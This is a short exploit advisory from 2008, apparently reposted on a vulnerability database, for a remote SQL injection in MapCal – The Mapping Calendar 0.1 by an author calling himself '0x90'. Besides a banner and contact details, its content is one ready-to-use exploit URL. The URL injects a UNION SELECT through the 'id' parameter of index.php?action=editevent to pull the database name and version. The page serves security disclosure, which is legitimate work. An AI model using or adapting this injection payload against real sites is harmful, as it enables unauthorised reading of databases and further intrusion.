Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20566
HistorySep 24, 2008 - 12:00 a.m.

MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

2008-09-2400:00:00
vulners.com
34
   _____          ____   _____
  /  _  \ /\  /\ / _  \ /  _  \
  | | | | \ \/ / ||_| | | | | |  
  | | | |  \  /  \_   | | | | |  
  | |_| |  /  \   __\ | | |_| |
  \_____/ / /\ \ |____/ \_____/
          \/  \/

[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: MapCal - The Mapping Calendar

[~] site: http://mapcal.sourceforge.net

[~] Vulnerability Class: SQL Injection

[~] Exploit:

http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events